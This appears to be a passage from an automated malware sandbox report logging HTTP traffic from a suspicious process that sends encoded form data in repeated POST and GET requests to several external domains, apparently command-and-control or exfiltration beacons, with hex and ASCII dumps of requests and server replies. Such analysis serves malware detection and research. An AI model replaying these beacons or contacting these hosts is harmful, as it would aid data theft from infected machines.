                                                                    Host: www.030002803.xyz
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    Accept-Encoding: gzip, deflate, br
                                                                    Origin: http://www.030002803.xyz
                                                                    Connection: close
                                                                    Content-Length: 225
                                                                    Cache-Control: max-age=0
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Referer: http://www.030002803.xyz/bw0u/
                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                                    Data Raw: 31 5a 71 44 3d 64 76 6d 51 48 68 44 77 52 4a 35 54 35 6e 51 51 58 73 2b 4d 59 32 66 4b 6f 49 61 50 34 43 31 58 4f 53 37 63 73 68 67 61 68 57 71 69 45 44 6b 6c 6e 48 41 42 34 6e 72 48 70 48 6c 78 51 72 35 61 56 47 39 38 56 49 72 66 69 34 4e 39 4e 73 55 35 4f 61 78 50 48 51 34 38 57 61 58 78 48 73 37 72 6c 6c 33 4e 38 46 62 75 55 6b 6b 39 2b 59 30 54 4e 55 44 75 75 7a 7a 58 37 74 2f 74 69 42 61 2b 79 37 31 38 62 6e 36 65 45 6b 45 48 6f 38 57 51 43 75 52 72 44 74 59 44 4e 32 4a 46 75 37 48 33 68 5a 52 77 63 6d 57 41 2f 46 33 77 63 55 41 50 71 36 73 41 56 57 42 56 68 2b 7a 41 62 38 4f 45 4e 38 38 4e 64 35 64 6e 7a 73 4e 56 72 50 58 2f 62 61 54 34 4a 72 71 39 77 48 41 54
                                                                    Data Ascii: 1ZqD=dvmQHhDwRJ5T5nQQXs+MY2fKoIaP4C1XOS7cshgahWqiEDklnHAB4nrHpHlxQr5aVG98VIrfi4N9NsU5OaxPHQ48WaXxHs7rll3N8FbuUkk9+Y0TNUDuuzzX7t/tiBa+y718bn6eEkEHo8WQCuRrDtYDN2JFu7H3hZRwcmWA/F3wcUAPq6sAVWBVh+zAb8OEN88Nd5dnzsNVrPX/baT4Jrq9wHAT
Jan 11, 2025 06:32:58.426966906 CET | 1236 | IN | HTTP/1.1 404 Not Found
                                                                    Server: nginx
                                                                    Date: Sat, 11 Jan 2025 05:32:58 GMT
                                                                    Content-Type: text/html; charset=utf-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: close
                                                                    Vary: Accept-Encoding
                                                                    ETag: W/"66cce1df-b96"
                                                                    Content-Encoding: gzip
                                                                    Data Raw: 35 34 65 0d 0a 1f 8b 08 00 00 00 00 00 00 03 8d 56 59 8f db 36 10 7e 76 7e 05 a3 22 48 0b 2c 69 1e a2 0e c7 5e 34 d9 26 68 1e 72 a0 db a2 e8 53 c0 95 28 4b 5d 59 74 24 da 5e a7 c8 7f ef 50 d7 ca 76 82 16 ba c8 99 f9 e6 e2 70 a8 e5 d3 5f 3e dc fc fe d7 c7 d7 28 b7 9b f2 fa c9 d2 7d 50 a9 aa f5 ca d3 95 77 fd 64 b6 cc b5 4a e1 3b 5b 6e b4 55 28 c9 55 dd 68 bb f2 76 36 c3 91 87 e6 8f ac 4a 6d f4 ca db 17 fa b0 35 b5 f5 50 62 2a ab 2b 10 3d 14 a9 cd 57 a9 de 17 89 c6 ed e4 0a 15 55 61 0b 55 e2 26 51 a5 5e b1 41 91 2d 6c a9 af 3f aa b5 46 ef 8d 45 6f cc ae 4a 97 f3 8e ea f8 8d 3d 76 a3 d9 9d 49 8f e8 1f 37 9a dd a9 e4 7e 5d 3b 51 9c 98 d2 d4 0b f4 43 26 dd f5 a2 65 6f 54 bd 2e 2a 6c cd 76 81 a2 67 1d 6d 90 93 a9 bb 3a 5a 06 fe e2 4c 6d 8a f2 b8 40 58 6d b7 a5 c6 cd b1 b1 7a 73 85 5e 95 45 75 ff 4e 25 b7 ed fc 0d 48 5e 21 ef 56 af 8d 46 7f bc f5 ae d0 6f e6 ce 58 03 b4 5f 75 b9 d7 b6 48 14 7a af 77 1a 38 2f 6b 08 f3 aa 35 30 f3 20 26 83 6e 55 d5 00 a3 81 0f 6e 74 5d 64 00 7b e9 ac a1 1b e7 15 7a bd 31 7f [TRUNCATED]
                                                                    Data Ascii: 54eVY6~v~"H,i^4&hrS(K]Yt$^Pvp_>(}PwdJ;[nU(Uhv6Jm5Pb*+=WUaU&Q^A-l?FEoJ=vI7~];QC&eoT.*lvgm:ZLm@Xmzs^EuN%H^!VFoX_uHzw8/k50 &nUnt]d{z1D7()St7JawG.z|Q&8UjXB]O;g}|5@Ro&i<b)~KmA5n*)55AZ,/svWrt1J;^lJ(?}in`yqB 3ZcNqE^x$W,zkS3'xPuKt$:!f$iUw?:!arVF*&P&mFWgC!;cC;xpUafKpZXzUR1k.1Z`?cVC4l- v\^x<XTM=z#zBqg[e_Ynwv2?tf.)x rkp8 ^9tGIw2+"$/V|NRkPqcq?mDEN&BFtKGQ/xI %iO|CqCJAtV"|"@(3'!A>0HpL(pHP8G,$Qc
Jan 11, 2025 06:32:58.426983118 CET | 370 | IN | Data Raw: ee 1c 82 a8 28 61 4c 60 21 49 08 3e c9 90 08 3a ce 38 25 3e 8f 21 99 be 04 2b a0 46 10 06 01 f5 33 e1 dc 8e 80 cb 7c 12 87 01 06 8b 22 10 2e 9a 20 08 31 70 a5 f0 91 10 8e 77 c3 fd 10 6c 43 2e 44 44 a4 fb b2 00 b2 05 38 9f 75 e3 38 d8 fb b0 02 e0
                                                                    Data Ascii: (aL`!I>:8%>!+F3|". 1pwlC.DD8u8'/]tt0{{"G8A~[F`\075"J0B,FM@y#zJaac8;)76EO=m?5L


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
19 | 192.168.2.8 | 49732 | 161.97.142.144 | 80 | 5220 | C:\Program Files (x86)\IohxXlskOCjsJwkzzussdTwxILitLLgYKgKJIWMApLcASetarOjlYvCBtHqoAMqfVGSmcHePnD\GtDTOqzvEb.exe
Timestamp | Bytes transferred | Direction | Data
Jan 11, 2025 06:33:00.443574905 CET | 1815 | OUT | POST /bw0u/ HTTP/1.1
                                                                    Host: www.030002803.xyz
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    Accept-Encoding: gzip, deflate, br
                                                                    Origin: http://www.030002803.xyz
                                                                    Connection: close
                                                                    Content-Length: 1241
                                                                    Cache-Control: max-age=0
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Referer: http://www.030002803.xyz/bw0u/
                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                                    Data Raw: 31 5a 71 44 3d 64 76 6d 51 48 68 44 77 52 4a 35 54 35 6e 51 51 58 73 2b 4d 59 32 66 4b 6f 49 61 50 34 43 31 58 4f 53 37 63 73 68 67 61 68 56 4b 69 45 78 38 6c 6d 6b 34 42 37 6e 72 48 33 33 6c 77 51 72 35 69 56 47 31 77 56 49 76 6c 69 39 4a 39 4e 4e 30 35 5a 37 78 50 4a 51 34 38 4a 4b 58 38 49 4d 36 76 6c 6c 6e 4a 38 46 4c 75 55 6b 6b 39 2b 61 73 54 45 68 6a 75 6f 7a 7a 59 38 74 2f 35 6f 68 61 53 79 37 39 43 62 6a 6d 6b 45 58 63 48 6f 63 47 51 50 38 35 72 4d 74 59 64 4f 32 4a 64 75 37 36 74 68 5a 4e 57 63 6e 6a 56 2f 46 50 77 65 44 45 58 34 4b 67 6a 41 6e 64 48 76 2b 48 42 61 73 65 56 45 4b 77 4c 42 34 78 36 6c 34 46 65 6d 4e 50 2f 57 72 4f 45 49 71 76 6d 30 41 77 54 75 73 7a 73 79 4a 4b 72 31 4b 43 73 36 31 78 45 52 4e 50 2b 6c 49 48 6a 55 67 76 61 46 42 63 64 44 36 70 69 61 61 56 55 4b 56 35 55 69 31 6d 76 4f 42 67 49 6c 49 48 31 6b 4b 7a 6d 59 77 32 7a 71 78 4c 2b 4d 58 36 2f 4d 35 64 77 4d 34 43 34 65 67 34 35 4e 36 63 43 53 45 68 65 6d 33 50 30 44 66 63 78 42 6b 79 49 6e 41 4b 2f 5a 4b 66 42 32 [TRUNCATED]
Data Ascii: 1ZqD= [TRUNCATED]
Jan 11, 2025 06:33:01.068217993 CET | 1236 | IN | HTTP/1.1 404 Not Found
                                                                    Server: nginx
                                                                    Date: Sat, 11 Jan 2025 05:33:00 GMT
                                                                    Content-Type: text/html; charset=utf-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: close
                                                                    Vary: Accept-Encoding
                                                                    ETag: W/"66cce1df-b96"
                                                                    Content-Encoding: gzip
                                                                    Data Raw: 35 34 65 0d 0a 1f 8b 08 00 00 00 00 00 00 03 8d 56 59 8f db 36 10 7e 76 7e 05 a3 22 48 0b 2c 69 1e a2 0e c7 5e 34 d9 26 68 1e 72 a0 db a2 e8 53 c0 95 28 4b 5d 59 74 24 da 5e a7 c8 7f ef 50 d7 ca 76 82 16 ba c8 99 f9 e6 e2 70 a8 e5 d3 5f 3e dc fc fe d7 c7 d7 28 b7 9b f2 fa c9 d2 7d 50 a9 aa f5 ca d3 95 77 fd 64 b6 cc b5 4a e1 3b 5b 6e b4 55 28 c9 55 dd 68 bb f2 76 36 c3 91 87 e6 8f ac 4a 6d f4 ca db 17 fa b0 35 b5 f5 50 62 2a ab 2b 10 3d 14 a9 cd 57 a9 de 17 89 c6 ed e4 0a 15 55 61 0b 55 e2 26 51 a5 5e b1 41 91 2d 6c a9 af 3f aa b5 46 ef 8d 45 6f cc ae 4a 97 f3 8e ea f8 8d 3d 76 a3 d9 9d 49 8f e8 1f 37 9a dd a9 e4 7e 5d 3b 51 9c 98 d2 d4 0b f4 43 26 dd f5 a2 65 6f 54 bd 2e 2a 6c cd 76 81 a2 67 1d 6d 90 93 a9 bb 3a 5a 06 fe e2 4c 6d 8a f2 b8 40 58 6d b7 a5 c6 cd b1 b1 7a 73 85 5e 95 45 75 ff 4e 25 b7 ed fc 0d 48 5e 21 ef 56 af 8d 46 7f bc f5 ae d0 6f e6 ce 58 03 b4 5f 75 b9 d7 b6 48 14 7a af 77 1a 38 2f 6b 08 f3 aa 35 30 f3 20 26 83 6e 55 d5 00 a3 81 0f 6e 74 5d 64 00 7b e9 ac a1 1b e7 15 7a bd 31 7f [TRUNCATED]
                                                                    Data Ascii: 54eVY6~v~"H,i^4&hrS(K]Yt$^Pvp_>(}PwdJ;[nU(Uhv6Jm5Pb*+=WUaU&Q^A-l?FEoJ=vI7~];QC&eoT.*lvgm:ZLm@Xmzs^EuN%H^!VFoX_uHzw8/k50 &nUnt]d{z1D7()St7JawG.z|Q&8UjXB]O;g}|5@Ro&i<b)~KmA5n*)55AZ,/svWrt1J;^lJ(?}in`yqB 3ZcNqE^x$W,zkS3'xPuKt$:!f$iUw?:!arVF*&P&mFWgC!;cC;xpUafKpZXzUR1k.1Z`?cVC4l- v\^x<XTM=z#zBqg[e_Ynwv2?tf.)x rkp8 ^9tGIw2+"$/V|NRkPqcq?mDEN&BFtKGQ/xI %iO|CqCJAtV"|"@(3'!A>0HpL(pHP8G,$Qc
Jan 11, 2025 06:33:01.068237066 CET | 370 | IN | Data Raw: ee 1c 82 a8 28 61 4c 60 21 49 08 3e c9 90 08 3a ce 38 25 3e 8f 21 99 be 04 2b a0 46 10 06 01 f5 33 e1 dc 8e 80 cb 7c 12 87 01 06 8b 22 10 2e 9a 20 08 31 70 a5 f0 91 10 8e 77 c3 fd 10 6c 43 2e 44 44 a4 fb b2 00 b2 05 38 9f 75 e3 38 d8 fb b0 02 e0
                                                                    Data Ascii: (aL`!I>:8%>!+F3|". 1pwlC.DD8u8'/]tt0{{"G8A~[F`\075"J0B,FM@y#zJaac8;)76EO=m?5L


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
20 | 192.168.2.8 | 49733 | 161.97.142.144 | 80 | 5220 | C:\Program Files (x86)\IohxXlskOCjsJwkzzussdTwxILitLLgYKgKJIWMApLcASetarOjlYvCBtHqoAMqfVGSmcHePnD\GtDTOqzvEb.exe
Timestamp | Bytes transferred | Direction | Data
Jan 11, 2025 06:33:02.987945080 CET | 515 | OUT | GET /bw0u/?1ZqD=QtOwEWL3Wb8oglkkfuLXaSHSreWpjDtOOnahtC8c9UbbFmMC6Wp+vCjxsEk2BpxEB3gHT+/6vot9OJxtQqkBMHc9XtXTW/yd7EP1snPpVQUS9+gXOgGxj0LXj8PsnCHHkg==&dbFX6=JLnL0 HTTP/1.1
                                                                    Host: www.030002803.xyz
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    Connection: close
                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Jan 11, 2025 06:33:03.593358994 CET | 1236 | IN | HTTP/1.1 404 Not Found
                                                                    Server: nginx
                                                                    Date: Sat, 11 Jan 2025 05:33:03 GMT
                                                                    Content-Type: text/html; charset=utf-8
                                                                    Content-Length: 2966
                                                                    Connection: close
                                                                    Vary: Accept-Encoding
                                                                    ETag: "66cce1df-b96"
                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a 09 09 3c 74 69 74 6c 65 3e 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 73 74 79 6c 65 3e 0a 09 09 09 62 6f 64 79 20 7b 0a 09 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 35 66 35 66 35 3b 0a 09 09 09 09 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 38 25 3b 0a 09 09 09 09 63 6f 6c 6f 72 3a 20 23 35 64 35 64 35 64 3b 0a 09 09 09 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 2d 61 70 70 6c 65 2d 73 79 73 74 65 6d 2c 20 42 6c 69 6e 6b 4d 61 63 53 79 73 74 65 6d 46 6f 6e 74 2c 20 22 53 65 67 6f 65 20 55 49 22 2c 20 52 6f 62 6f 74 6f 2c 20 22 48 [TRUNCATED]
                                                                    Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8" /><meta name="viewport" content="width=device-width, initial-scale=1" /><title>Page Not Found</title><style>body {background-color: #f5f5f5;margin-top: 8%;color: #5d5d5d;font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, "Helvetica Neue", Arial,"Noto Sans", sans-serif, "Apple Color Emoji", "Segoe UI Emoji", "Segoe UI Symbol","Noto Color Emoji";text-shadow: 0px 1px 1px rgba(255, 255, 255, 0.75);text-align: center;}h1 {font-size: 2.45em;font-weight: 700;color: #5d5d5d;letter-spacing: -0.02em;margin-bottom: 30px;margin-top: 30px;}.container {width: 100%;margin-right: auto;margin-left: auto;}.animate__animated {animation-duration: 1s;animation-fill-mode: both;}.animate__fadeIn {animation-name: fadeIn;}.info {color: #5594cf;fill: #5594cf;}.error [TRUNCATED]
Jan 11, 2025 06:33:03.593379021 CET | 1236 | IN | Data Raw: 3b 0a 09 09 09 09 66 69 6c 6c 3a 20 23 63 39 32 31 32 37 3b 0a 09 09 09 7d 0a 0a 09 09 09 2e 77 61 72 6e 69 6e 67 20 7b 0a 09 09 09 09 63 6f 6c 6f 72 3a 20 23 66 66 63 63 33 33 3b 0a 09 09 09 09 66 69 6c 6c 3a 20 23 66 66 63 63 33 33 3b 0a 09 09
                                                                    Data Ascii: ;fill: #c92127;}.warning {color: #ffcc33;fill: #ffcc33;}.success {color: #5aba47;fill: #5aba47;}.icon-large {height: 132px;width: 132px;}.description-text {color: #707
Jan 11, 2025 06:33:03.593389988 CET | 448 | IN | Data Raw: 39 34 31 20 32 31 36 20 32 39 36 76 34 63 30 20 36 2e 36 32 37 20 35 2e 33 37 33 20 31 32 20 31 32 20 31 32 68 35 36 63 36 2e 36 32 37 20 30 20 31 32 2d 35 2e 33 37 33 20 31 32 2d 31 32 76 2d 31 2e 33 33 33 63 30 2d 32 38 2e 34 36 32 20 38 33 2e
                                                                    Data Ascii: 941 216 296v4c0 6.627 5.373 12 12 12h56c6.627 0 12-5.373 12-12v-1.333c0-28.462 83.186-29.647 83.186-106.667 0-58.002-60.165-102-116.531-102zM256 338c-25.365 0-46 20.635-46 46 0 25.364 20.635 46 46 46s46-20.636 46-46c0-25.365-20.635-46-46-46z"
Jan 11, 2025 06:33:03.593400002 CET | 250 | IN | Data Raw: 09 3c 70 3e 4f 6f 70 73 21 20 57 65 20 63 6f 75 6c 64 6e 27 74 20 66 69 6e 64 20 74 68 65 20 70 61 67 65 20 74 68 61 74 20 79 6f 75 27 72 65 20 6c 6f 6f 6b 69 6e 67 20 66 6f 72 2e 3c 2f 70 3e 0a 09 09 09 09 09 09 3c 70 3e 50 6c 65 61 73 65 20 63
                                                                    Data Ascii: <p>Oops! We couldn't find the page that you're looking for.</p><p>Please check the address and try again.</p><section class="footer"><strong>Error Code:</strong> 404</section></div></div></div></div></body><


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
21 | 192.168.2.8 | 49734 | 85.233.160.22 | 80 | 5220 | C:\Program Files (x86)\IohxXlskOCjsJwkzzussdTwxILitLLgYKgKJIWMApLcASetarOjlYvCBtHqoAMqfVGSmcHePnD\GtDTOqzvEb.exe
Timestamp | Bytes transferred | Direction | Data
Jan 11, 2025 06:33:08.706007957 CET | 763 | OUT | POST /9hv6/ HTTP/1.1
                                                                    Host: www.2bhp.com
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    Accept-Encoding: gzip, deflate, br
                                                                    Origin: http://www.2bhp.com
                                                                    Connection: close
                                                                    Content-Length: 205
                                                                    Cache-Control: max-age=0
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Referer: http://www.2bhp.com/9hv6/
                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                                    Data Raw: 31 5a 71 44 3d 74 69 34 6f 72 4a 45 58 6f 54 4b 63 30 78 67 56 31 32 48 44 2b 48 53 34 39 54 30 4e 78 77 49 79 49 32 34 6c 41 76 63 77 46 7a 79 56 46 75 54 38 52 2b 2f 58 36 62 66 78 51 2b 50 6a 74 47 42 30 44 4b 59 2f 69 59 34 44 57 63 49 66 45 70 5a 58 7a 64 48 55 75 36 74 78 76 33 69 43 68 79 46 35 43 4a 62 69 54 6b 32 53 64 6d 64 41 59 35 4e 62 59 37 62 43 64 73 54 4f 48 55 77 32 7a 39 7a 5a 33 6a 39 51 6b 5a 4c 2b 43 4b 57 52 50 76 63 38 54 58 79 2b 50 6d 45 5a 55 53 57 59 50 71 63 67 6a 4d 78 71 35 50 55 38 43 6a 2b 77 48 4d 59 6f 41 62 4e 38 4a 43 57 65 2b 47 61 77 55 6e 4c 4e 42 6c 56 53 52 58 59 3d
                                                                    Data Ascii: 1ZqD=ti4orJEXoTKc0xgV12HD+HS49T0NxwIyI24lAvcwFzyVFuT8R+/X6bfxQ+PjtGB0DKY/iY4DWcIfEpZXzdHUu6txv3iChyF5CJbiTk2SdmdAY5NbY7bCdsTOHUw2z9zZ3j9QkZL+CKWRPvc8TXy+PmEZUSWYPqcgjMxq5PU8Cj+wHMYoAbN8JCWe+GawUnLNBlVSRXY=
Jan 11, 2025 06:33:09.301889896 CET | 174 | IN | HTTP/1.0 303 See Other
                                                                    Date: Sat, 11 Jan 2025 05:33:09 GMT
                                                                    Server: Forwarding
                                                                    Location: /
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 0
                                                                    Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
22 | 192.168.2.8 | 49735 | 85.233.160.22 | 80 | 5220 | C:\Program Files (x86)\IohxXlskOCjsJwkzzussdTwxILitLLgYKgKJIWMApLcASetarOjlYvCBtHqoAMqfVGSmcHePnD\GtDTOqzvEb.exe
Timestamp | Bytes transferred | Direction | Data
Jan 11, 2025 06:33:11.255626917 CET | 783 | OUT | POST /9hv6/ HTTP/1.1
                                                                    Host: www.2bhp.com
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    Accept-Encoding: gzip, deflate, br
                                                                    Origin: http://www.2bhp.com
                                                                    Connection: close
                                                                    Content-Length: 225
                                                                    Cache-Control: max-age=0
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Referer: http://www.2bhp.com/9hv6/
                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                                    Data Raw: 31 5a 71 44 3d 74 69 34 6f 72 4a 45 58 6f 54 4b 63 37 78 51 56 33 52 54 44 32 48 53 37 68 6a 30 4e 37 51 49 2b 49 32 30 6c 41 71 6b 67 43 41 57 56 46 50 6a 38 51 2f 2f 58 33 37 66 78 62 65 50 69 67 6d 42 37 44 4b 55 47 69 61 38 44 57 63 4d 66 45 6f 46 58 7a 73 48 58 75 71 74 7a 6b 58 69 41 6c 79 46 35 43 4a 62 69 54 6b 53 6f 64 6d 56 41 59 4a 64 62 62 66 48 64 44 63 54 4e 51 6b 77 32 6c 4e 7a 56 33 6a 39 32 6b 59 58 59 43 4a 75 52 50 71 34 38 53 47 79 39 57 32 45 66 5a 79 58 75 42 71 39 31 6b 63 52 37 34 2b 30 69 4f 41 6a 55 50 61 31 43 61 35 46 36 4b 43 2b 31 2b 46 79 47 52 51 57 6c 62 47 46 69 50 41 4d 6f 39 4b 7a 4b 42 2b 64 58 4e 75 30 5a 50 75 2f 33 70 34 57 74
                                                                    Data Ascii: 1ZqD=ti4orJEXoTKc7xQV3RTD2HS7hj0N7QI+I20lAqkgCAWVFPj8Q//X37fxbePigmB7DKUGia8DWcMfEoFXzsHXuqtzkXiAlyF5CJbiTkSodmVAYJdbbfHdDcTNQkw2lNzV3j92kYXYCJuRPq48SGy9W2EfZyXuBq91kcR74+0iOAjUPa1Ca5F6KC+1+FyGRQWlbGFiPAMo9KzKB+dXNu0ZPu/3p4Wt
Jan 11, 2025 06:33:11.836436987 CET | 174 | IN | HTTP/1.0 303 See Other
                                                                    Date: Sat, 11 Jan 2025 05:33:11 GMT
                                                                    Server: Forwarding
                                                                    Location: /
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 0
                                                                    Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
23 | 192.168.2.8 | 49736 | 85.233.160.22 | 80 | 5220 | C:\Program Files (x86)\IohxXlskOCjsJwkzzussdTwxILitLLgYKgKJIWMApLcASetarOjlYvCBtHqoAMqfVGSmcHePnD\GtDTOqzvEb.exe
Timestamp | Bytes transferred | Direction | Data
Jan 11, 2025 06:33:13.805814028 CET | 1800 | OUT | POST /9hv6/ HTTP/1.1
                                                                    Host: www.2bhp.com
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    Accept-Encoding: gzip, deflate, br
                                                                    Origin: http://www.2bhp.com
                                                                    Connection: close
                                                                    Content-Length: 1241
                                                                    Cache-Control: max-age=0
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Referer: http://www.2bhp.com/9hv6/
                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                                    Data Raw: 31 5a 71 44 3d 74 69 34 6f 72 4a 45 58 6f 54 4b 63 37 78 51 56 33 52 54 44 32 48 53 37 68 6a 30 4e 37 51 49 2b 49 32 30 6c 41 71 6b 67 43 41 65 56 47 35 58 38 52 63 6e 58 32 37 66 78 48 75 50 6e 67 6d 42 69 44 4b 4d 43 69 61 78 2b 57 5a 51 66 46 4b 68 58 31 65 2f 58 67 71 74 7a 72 33 69 42 68 79 46 6f 43 49 72 6d 54 6b 69 6f 64 6d 56 41 59 4c 56 62 50 37 62 64 42 63 54 4f 48 55 77 69 7a 39 7a 35 33 6a 30 44 6b 59 44 58 43 34 4f 52 50 4b 6f 38 51 30 71 39 4a 6d 45 64 59 79 58 6d 42 71 77 6c 6b 63 4d 4b 34 2b 41 45 4f 41 62 55 66 2f 56 42 66 64 56 4e 57 6b 32 56 6e 46 61 42 50 6a 32 31 5a 46 46 49 4c 77 51 39 36 76 37 79 4b 49 68 59 48 2b 6c 46 53 5a 72 4b 76 74 79 6c 41 43 51 59 4b 31 67 50 34 69 71 44 4a 6e 55 45 72 73 31 41 2b 79 74 6b 49 54 52 2b 7a 6b 36 78 58 75 34 53 42 59 2f 31 6b 30 4c 79 6a 62 58 42 44 56 6c 43 68 56 6b 6e 54 64 71 74 72 50 59 44 63 49 4c 70 49 6d 72 59 2b 70 4f 49 4d 2b 71 6c 2f 47 51 43 73 35 4d 72 50 35 2f 70 44 71 6b 32 47 43 5a 48 4d 5a 39 74 54 4f 65 46 67 32 37 4c 4b [TRUNCATED]
                                                                    Data Ascii: 1ZqD=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 [TRUNCATED]
                                                                    Jan 11, 2025 06:33:14.379079103 CET | 174 | IN | HTTP/1.0 303 See Other
                                                                    Date: Sat, 11 Jan 2025 05:33:14 GMT
                                                                    Server: Forwarding
                                                                    Location: /
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 0
                                                                    Connection: close


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                    24 | 192.168.2.8 | 49737 | 85.233.160.228 | 80 | 5220 | C:\Program Files (x86)\IohxXlskOCjsJwkzzussdTwxILitLLgYKgKJIWMApLcASetarOjlYvCBtHqoAMqfVGSmcHePnD\GtDTOqzvEb.exe
                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                    Jan 11, 2025 06:33:16.348191023 CET | 510 | OUT | GET /9hv6/?1ZqD=ggQIo5gV7zHF4RoJrW67zXedyj4Z9AdEETJPM44fUDmvE5zVPN+96oHBfd6Q3012XKsPi7h4Ls5HOMc1y+WXq6tX0X203QdCFZPEDkOrZS9vV9N9P/Prcpb0HgUUjs6D2w==&dbFX6=JLnL0 HTTP/1.1
                                                                    Host: www.2bhp.com
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    Connection: close
                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                                    Jan 11, 2025 06:33:16.923230886 CET | 174 | IN | HTTP/1.0 303 See Other
                                                                    Date: Sat, 11 Jan 2025 05:33:16 GMT
                                                                    Server: Forwarding
                                                                    Location: /
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 0
                                                                    Connection: close


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                    25 | 192.168.2.8 | 49738 | 136.143.186.12 | 80 | 5220 | C:\Program Files (x86)\IohxXlskOCjsJwkzzussdTwxILitLLgYKgKJIWMApLcASetarOjlYvCBtHqoAMqfVGSmcHePnD\GtDTOqzvEb.exe
                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                    Jan 11, 2025 06:33:22.182205915 CET | 778 | OUT | POST /m8yb/ HTTP/1.1
                                                                    Host: www.lanxuanz.tech
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    Accept-Encoding: gzip, deflate, br
                                                                    Origin: http://www.lanxuanz.tech
                                                                    Connection: close
                                                                    Content-Length: 205
                                                                    Cache-Control: max-age=0
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Referer: http://www.lanxuanz.tech/m8yb/
                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
